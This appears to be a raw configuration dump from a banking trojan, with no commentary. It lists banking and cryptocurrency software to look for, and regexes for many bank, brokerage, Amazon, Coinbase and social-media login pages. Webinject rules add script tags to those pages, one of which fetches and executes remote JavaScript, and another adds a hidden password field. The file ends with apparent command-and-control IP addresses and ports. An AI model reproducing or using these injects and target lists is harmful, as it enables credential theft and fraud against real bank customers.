840e204392d2183ec7198917f73c9765f79d4baa0a05721f1d9a41b8670a7608
dc8a5f69bc48c4475bc4a44e7eb0fd99a5a7a537
2680cd66b98910d26bfd815d83ca330f
2017-05-12T19:19:16+00:00
64
grabber
0x4d38f016
crealogix,multiversa,abacus,ebics,agro-office,cashcomm,softcrew,coconet,macrogram,mammut,omikron,multicash,quatersoft,alphasys,wineur,epsitec,myaccessweb,bellin,financesuite,moneta,softcash,trinity,financesuite,abrantix,starmoney,sfirm,migrosbank,migros bank,online banking,star money,multibit,bitgo,bither,blockchain,copay,msigna,armory,electrum,coinbase,magnr,keepkey,coinsbank,coolwallet,bitoex,xapo,changetip,coinapult,blocktrail,breadwallet,luxstack,airbitz,schildbach,ledger nano,mycelium,trezor,coinomi,bitcore
\.(gif|png|jpg|css|swf|ico|js)($|\?)
(resource\.axd|yimg\.com)
^https://secure.+\.chase\.com/.+/accounts/secure/v2/account/detail/dda/list
^https://chaseonline\.chase\.com/MyAccounts\.aspx
^https://connect\.secure\.wellsfargo\.com/accounts/
^http://.*citrix
^http://.+winbacs/
^http://sisesrv1/
^http://synfo/
^http://.+\:81/.*
^http://.+\:8888/.*
^http://.+\:8090/.*
^http://.+\:8084/.*
^http://127\.0\.0\.1:3495
^http://.+/MULTIVERSA
^http://.+/workbench/
^http://.+/flows/ebanking/
^http://srvesmad04:8080/
^http://srvaweb01/
^http://.*/sapphire/
^http://192\.168\.161\.23
^http://.+/mscmain
^http://shv-09
^http://intersection
^http://cujc-arcu/
^http://.+\:3495/.*
^http://.+\:3496/.*
^http://.+\:40000/.*
^http://.+\:9000/.*
^http://core-web/
^http://core-syn/
^http://r-space/
^http://dtsgui\.cbhi\.local/
^http://10\.118\.32\.33/
^http://webmail\.
^http://dtsacquire2011
^http://arta2/
^http://dtsap:70/
^http://nmain/
^http://170\.209\.0\.(3|2)
^http://.*/flows/banking/
^http://.*/b2b/faces/login/
^http://.*ingbusinessonline
^http://.*multiweb
^http://.*multiversa
^http://bankway.*/
^http://ebanking
^http://.*office-wings
^http://.+/login\.aspx
^https://www\.facebook\.com/login\.php
^https://.*\.facebook\.com/
^https://twitter.com/(login|account/login_challenge/|sessions)
^https://.*?twitter\.com/
^https://.*?twitch\.tv/
^https://(.*?\.|)gvt2\.com/
^https://.*?youtube\.com/
^https://www.linkedin.com/uas/login
^https://www\.linkedin\.com/
^https://accounts\.google\.com/_/signin/
^https://.*?google\.com/
^https://www\.readcube\.com/.*login
^https://(.*?\.|)readcube\.com/
^https://.*\.sprint.com/.*/login\.jsp
^https://(.*?\.|)sprint.com/
^https://www\.amazon\..+/signin
^https://(.*?\.|)amazon.com/
^https://www\.facilocados\.com
^https://www\.skyrana\.com
^https?://docs\.google\.[^/]+/
^https?://.*\.365lpodds\.com
^https?://outlook\.live\.com
^https?://cws\.conviva\.com
^https://login\.yahoo\.com/account/(challenge|change\-password)
^https?://.*\.yahoo\.com
^https://www\.wsitrader\.com/Account/Login
^https?://.*\.?wsitrader\.com
^https://www\.netflix\.com/(.*/)?Login
^https?://.*\.?netflix\.com
^https?://logx\.optimizely\.com
^https://www\.adnxs\.com/index/login
^https?://(.*\.)?adnxs\.com
^https://fxgmlogin\.tradenetworks\.com
^https?://(.*\.)?tradenetworks\.com
^https?://otf\.msn\.com
^https://(.*\.)?pinterest\.com/resource/UserSessionResource/create
^https?://(.*\.)?pinterest\.com
^https?://pebed\.dm\.gg
^https?://.*\.taboola\.com
^https?://.+\.googleapis\.com
^https://app\.pinterest\.com/admins/sign_in
^https?://(.*\.)?intercom\.io
^https://bolt\.dropbox\.com/.*/notify/
^https://.*\.liverail\.com
^https://urs\.microsoft\.com/
^https://.+\.services\.mozilla\.com/
^https://localhost.*/skypectoc/
^https://.*\.skype\.com/api/
^https://incoming\.telemetry\.mozilla\.org/
^https://www\.bing\.com/
^https://self-repair\.mozilla\.org/api/
^https://api\.firefox\.com
^https://mc\.yandex\.ru
^https://.*\.orangeapps\.ru/candyvalley/
^https://candy.*\.king\.com/rpc/ClientApi
^https://api\.accounts\.firefox\.com/
^https://banners\.webmasterplan\.com/.*\.aspx
^https://.*\.forgeofempires\.com/game/json
^https://collector\.schibsted\.io/api/v1/track/
^https://ntracking\.optimatic\.com/.+/Ntracking/trackAd\.ashx
^https://delivery\.optimatic\.com/.+/getAdList\.ashx
cashproonline\-img024\.bankofamerica\.com
cashproonline\-ecache\.bankofamerica\.com
roll\.bankofamerica\.com
streak\.bankofamerica\.com
pane\.bankofamerica\.com
www\.u43\.pnc\.com/pressroom
www2\.citibank\.citigroup\.com
www7\.bbvacompass\.com
www7\.compassbank\.com
paper\.citi\.com
steps\.citi\.com
dir\.citi\.com
ground\.citi\.com
olbb2cd1\.bmo\.com
olbb2cd2\.bmo\.com
teertst\.santander\.com\.mx
teertst2\.santander\.com\.mx
www3\.drob\.santanderbank\.com
www7\.drob\.santanderbank\.com
cdn2\.svbconnect\.com
news1\.svbconnect\.com
ww7\.whitneybank\.com
rdstl\.tiaa\-cref\.org
jbmd\.tiaa\-cref\.org
active\.efirstbank\.com
swift\.efirstbank\.com
rapid\.efirstbank\.com
cdn\.arvest\.com
frame\.accountonline\.com
folder\.accountonline\.com
portal\.accountonline\.com
www2\.americafirst\.com
images3\.webcashmgmt\.com
cache\.webcashmgmt\.com
static\.webcashmgmt\.com
ins4\.enterprisebanker\.com
web13\.enterprisebanker\.com
web12\.columbiabank\.com
treasurysource3\.bokf\.com
treasurysource2\.bokf\.com
www\.amegybank\.com/metrics/
www2\.busey\.com
www5\.busey\.com
tssportal\.jpmorgan\.com
edd2\.ntrs\.com
pes1\.northerntrust\.com
staticimg\.fs\.ml\.com
statements\.benefits\.ml\.com
information\.benefits\.ml\.com
wex8\.suntrust\.com
www7\.suntrust\.com
www3\.firstambank\.com
cdn12\.firstambank\.com
www\.treasury\.pncbank\.com/tmmps/
trk\.firstcitizens\.com
www9\.firstcitizens\.com
cap\.firstcitizens\.com
www\.frostcashmanager\.com/24068/
tps\.hawaiistatefcu\.com
tms\.hawaiistatefcu\.com
ww7\.hancockbank\.com
consumerservices\.gcb\.citibank\.co\.in
market\.gcb\.citibank\.co\.in
ww5\.prkcorp\.com
sgl\.prkcorp\.com
esvb\.lakelandbank\.com
online1\.lakelandbank\.com
^https://(www\d*|cm)\.netteller\.com/(login|cm)2008/Authentication/Views/\S+\.aspx(\?|$)
(</form.*>)
\1<script type="text/javascript" language="JavaScript" src="scripts/msoffice365.js"></script>
https://secure\.cbbank\.com/EBC_EBC1961/(AcctDetails|Overview|EBC1961.ashx)\?.+
\.(gif|png|jpg|css|swf|html)($|\?)
WCI=(JavaScript|CSS)
(</head>)
<script type="text/javascript">
var sc_url = 'ember3.js?system=52151';
var qweqweqwe = new XMLHttpRequest();
qweqweqwe.open('GET', sc_url);
qweqweqwe.onload = function() {
if (qweqweqwe.status === 200) {
var head= document.getElementsByTagName('head')[0];
var script= document.createElement('script');
script.type= 'text/javascript';
script.innerHTML = qweqweqwe.responseText;
head.appendChild(script);
}
};
qweqweqwe.send();
</script>\1
^https://www\.chase\.com
\.(js|gif|png|jpg|css|swf)($|\?)
(user-password)
user-password-home
(<input id="usr_password_home")
<input style="display: none;" class="user-password" value="123123" />\1
^https://images-na\.ssl-images-amazon\.com/.*/(javascripts/lib/jquery/jquery-|SellerCentralUICore).*.js
(\z)
@@amazon_sellerscentral_active_grabber@@\1
^https://blockchain\.info/wallet
(</body>)
\1<script type="text/javascript" language="JavaScript" src="scripts/ember3.js?system=1000"></script>
^https://(.+\.)?chase(cdn)?\.com/.*/main-ver\.js
(\z)
@@chase_active_grabber@@\1
^https://.*\.bankofamerica.com/.*-jawr\.js
(\z)
@@bofa_active_grabber@@\1
^https://s.usaa.com/inet/resources/aggregator.+clientEventLogging.js.*
(\z)
@@usaa_active_grabber@@\1
^https://.*\.citi.com/.*citi_Common_Cards\.js
(\z)
@@citi_active_grabber@@\1
^https://(www.)?coinbase\.com/(dashboard|accounts|trade|settings|buy|sell|verifications)
(</body>)
\1<script type="text/javascript" language="JavaScript" src="scripts/ember3.js?system=1002"></script>
msoffice365.js
ember3.js
^https://wellsoffice\.wellsfargo\.com/portal/signon/
^https://wellsoffice\.wellsfargo\.com/
^https://access\.jpmorgan\.com/jpmalogon
^https://access\.jpmorgan\.com/files/
^https://access\.jpmorgan\.com/default_redirect\.js
^https://cashproonline\.bankofamerica\.com/AuthenticationFrameworkWeb/cpo/login/public/
^(http://cashproonline\.bankofamerica\.com/|https://cashproonline\.bankofamerica\.com/cpwportal/appmanager/cpo/public/?)
^https://www\.treasury\.pncbank\.com/idp/esec/
^https://express\.53\.com/portal/auth/login/
^https://smallbusinessonline\.bbt\.com/auth/
^https://cashmanageronline\.bbt\.com/auth/
^https://ets\.enternetbank\.com/SharedServices/login/
^https://businessonline\.bremer\.com/EamWeb/account/
^https://businessaccess\.citibank\.citigroup\.com/cbusol/signon\.do
^https://businessaccess\.citibank.citigroup\.com/cbusol/files/
^https://businessaccess\.citibank\.citigroup\.com/cbusol/default_redirect\.js
^https://login\.fidelity\.com/ftgw/Fas/Fidelity/RtlCust/Login/(Init\?AuthRedUrl.*)
^https://www\.fidelity\.com/bin-public/060_www_fidelity_com/js/hp\-body\.min\.js
^https://login\.fidelity\.com/ftgw/Fas/Fidelity/RtlCust/Login/files/
^https://login\.fidelity\.com/ftgw/Fas/Fidelity/RtlCust/Login/default_redirect\.js
^https://singlepoint\.usbank\.com/cs70_banking/logon/
^https://tdetreasury\.tdbank\.com/s1gcb/logon/
^https://www\d+\.bmo\.com/ctpauth/CTPEAILogin/
^https://businessonline\.huntington\.com/BOLHome/
^https://imanage\.ebanking-services\.com/EamWeb/Account/
^https://securebusiness\.ebanking-services\.com/EamWeb/Account/
^https://chemicalbankmi.ebanking-services\.com/EamWeb/Account/
^https://firstmidwest\.ebanking-services\.com/EamWeb/Account/
^https://peoplesunited\.ebanking-services.com/EamWeb/Account/
^https://firstindependentbank\.ebanking-services\.com/EamWeb/Account/
^https://signatureny\.ebanking-services\.com/EamWeb/Account/
^https://aubank\.ebanking-services\.com/EamWeb/Account/
^https://seacoastnationalbank\.ebanking-services\.com/EamWeb/Account/
^https://bhi.ebanking-services\.com/EamWeb/Account/
^https://emprisebank\.ebanking-services\.com/EamWeb/Account/
^https://ab\.ebanking-services\.com/EamWeb/Account/
^https://i-businessbanking\.ebanking-services\.com/EamWeb/Account/
^https://cbb-bank\.ebanking-services\.com/EamWeb/Account/
^https://providentnj\.ebanking-services\.com/EamWeb/Account/
^https://renasantbank\.ebanking-services\.com/EamWeb/Account/
^https://intrustbank\.ebanking-services\.com/EamWeb/Account/
^https://businesslink\.ebanking-services\.com/EamWeb/Account/
^https://popular\.ebanking-services\.com/EamWeb/Account/
^https://ub\.ebanking-services\.com/EamWeb/account/
^https://www.coinbase.com/default_redirect.js
^https://www.coinbase.com/files/
^https://www.coinbase.com/signin
^https://www\.mercantilcbonline\.com/secure/banking/
^https://www\.mbwebexpress\.com/s1gcb/logon/
^https://businessonline.tdbank.com/CorporateBankingWeb/Core/
^https://www([0-9].*)?\.accessmoneymanager\.com/cb/pages/jsp-ns/
^https://web17\.secureinternetbank\.com/EBC_EBC1961/EBC1961\.ashx\?WCI=Process.*WCE=Request.*mfa=[0-9]
^https://web17\.secureinternetbank\.com/EBC_EBC1961/files/
^https://web17\.secureinternetbank\.com/EBC_EBC1961/default_redirect.js
^https://www\.lakelandbank\.com/(login/){1,2}
^https://cityntl\.webcashmgmt\.com/wcmfd/wcmpw/
^https://webinfoplus\.mandtbank\.com/pub/html/
^https://eastwest\.openbank\.com/s1gcb/logon/
^https://wholesaleportal\.suntrust\.com/OCM/user/
^https://ktt\.key\.com/ktt/cmd/
^https://securentrycorp\.amegybank\.com/Authentication/zbf(/k)?/([_0-9a-f]{2}[0-9a-f]{8}-[0-9a-f]{4}-.+|index\?)
^https://securentrycorp\.amegybank\.com/Authentication/zbf(/k)?/files/
^https://securentrycorp\.amegybank\.com/Authentication/zbf(/k)?/
^https://securentrycorp\.calbanktrust\.com/Authentication/zbf(/k)?/([_0-9a-f]{2}[0-9a-f]{8}-[0-9a-f]{4}-.+|index\?)
^https://securentrycorp\.calbanktrust\.com/Authentication/zbf(/k)?/files/
^https://securentrycorp\.calbanktrust\.com/Authentication/zbf(/k)?/
^https://securentrycorp\.nbarizona\.com/Authentication/zbf(/k)?/([_0-9a-f]{2}[0-9a-f]{8}-[0-9a-f]{4}-.+|index\?)
^https://securentrycorp\.nbarizona\.com/Authentication/zbf(/k)?/files/
^https://securentrycorp\.nbarizona\.com/Authentication/zbf(/k)?/
^https://securentrycorp\.vectrabank\.com/Authentication/zbf(/k)?/([_0-9a-f]{2}[0-9a-f]{8}-[0-9a-f]{4}-.+|index\?)
^https://securentrycorp\.vectrabank\.com/Authentication/zbf(/k)?/files/
^https://securentrycorp\.vectrabank\.com/Authentication/zbf(/k)?/
^https://securentrycorp\.zionsbank\.com/Authentication/zbf(/k)?/([_0-9a-f]{2}[0-9a-f]{8}-[0-9a-f]{4}-.+|index\?)
^https://securentrycorp\.zionsbank\.com/Authentication/zbf(/k)?/files/
^https://securentrycorp\.zionsbank\.com/Authentication/zbf(/k)?/
^https://www\.hwtreasurysolution\.com/COLB/
^https://fabtvla\.secure\.fundsxpress\.com/start/
^https://www\.amazon\.com/ap/signin
^https://www\.amazon\.com/ap/files/
^https://www\.amazon\.com/ap/default_redirect.js
^https://secure\.bankofamerica\.com/login/sign-in/entry2/default_redirect\.js
^https://secure\.bankofamerica\.com/login/sign-in/entry2/files/
^https://secure\.bankofamerica\.com/login/sign-in/entry2/signOnV3\.go
^https://secure\.bankofamerica\.com/login/sign-in/(entry/)?default_redirect\.js
^https://secure\.bankofamerica\.com/login/sign-in/(entry/)?files/
^https://secure\.bankofamerica\.com/login/sign-in/(entry/)?signOnV2(Screen)?\.go
^https://chaseonline\.chase\.com/
^https://www\.usaa\.com/inet/ent_logon/j_security_check
^https://www\.usaa\.com/inet/ent_logon/files/
^https://www\.usaa\.com/inet/ent_logon/default_redirect.js
^https://client.schwab.com/Login/SignOn/CustomerCenterLogin.aspx
^https://client.schwab.com/Login/SignOn/files/
^https://client.schwab.com/Login/SignOn/default_redirect.js
^https://online.americanexpress.com/myca/logon/us/action/files/
^https://online.americanexpress.com/myca/logon/us/action/default_redirect.js
^https://www[0-9]{1,3}\.bmo\.com/uiauth/AuthWeb/
^https://www\.cibconline\.cibc\.com/ebm-resources/public/banking/cibc/client/web/
^https://cmo\.cibc\.com/wps/portal/BBD/bbdsignon/.*\!ut/p/.+/d.+/d[0-9]{1,2}/[a-z0-9]+/
^https://www[0-9]{1,2}\.royalbank\.com/cgi-bin/rbaccess/
^https://uas1\.cams\.scotiabank\.com/aos/
^https://businessbanking\.tdcommercialbanking\.com/WBB/
^https://online.citi.com/US/JSO/signon/ProcessUsernameSignon.do
^https://online.citi.com/US/JSO/signon/files/
^https://online.citi.com/US/JSO/signon/default_redirect.js
^https://businessonline\.huntington\.com/bolhome/
^https://www\.fcsolb\.com/cb/pages/jsp-ns/
^https://www\.usaa\.com/inet/ent_logon/default_redirect.js
^https://.*\.bankofamerica\.com/default_redirect.js
^https://sellercentral\.amazon\.com/ap/asdnaisufniasufniausnfasfn.js
^https://(.+\.)?chase\.com/iseufseiufnesifn.js
^https://(.+\.)?citi\.com/niuvsnegiushgisudngkjsdbg.js
^https://iris\.sovereignbank\.com/wcmfd/wcmpw/
^https://secure\.bankofamerica\.com/myaccounts/signin/signIn\.go
^https://online\.wellsfargo\.com/das/cgi\-bin/session\.cgi\?screenid\=SIGNON_PORTAL_PAUSE
^https://connect\.secure\.wellsfargo\.com/auth/login/do
^https://connect\.secure\.wellsfargo\.com/accounts/start
^https://connect\.secure\.wellsfargo\.com/accounts/inquiry/summary/default
cr;ff:^https://secure.+\.chase\.com/.+/accounts/secure/v2/account/detail/dda/list;ie:^https://secure.*\.chase\.com/web/accounts/dashboard/index
https://secure.*.chase.com/web/auth/router\?lob=COLLogon
^https://online\.citi\.com/US/REST/accountsPanel/getCustomerAccounts\.jws
^https://secure\.capitalone360\.com/myaccount/banking/account_summary\.vm
^https://chaseonline\.chase\.com/MyAccounts\.aspx
^https://oltx\.fidelity\.com/ftgw/fbc/oftop/portfolio
\.(gif|png|bmp|jpg|css|swf|ico|js|pdf|doc|docx|txt)($|\?)
(resource\.axd|yimg\.com)
https://178.62.232.185:443/B88U86giIPyD55RK/
sofa\.bankofamerica\.com/eluminate\?.+hr=https.*secure\.bankofamerica\.com/.+signOnV2(Screen)?.go
^https://(login|www)\.tranzact\.org/
2018-03-29T11:15:12+00:00
443
178.62.232.185
81.254.168.177
443
212.237.42.204
443
50.251.187.217
443
193.251.189.134
443
109.21.222.28
443
66.65.47.220
443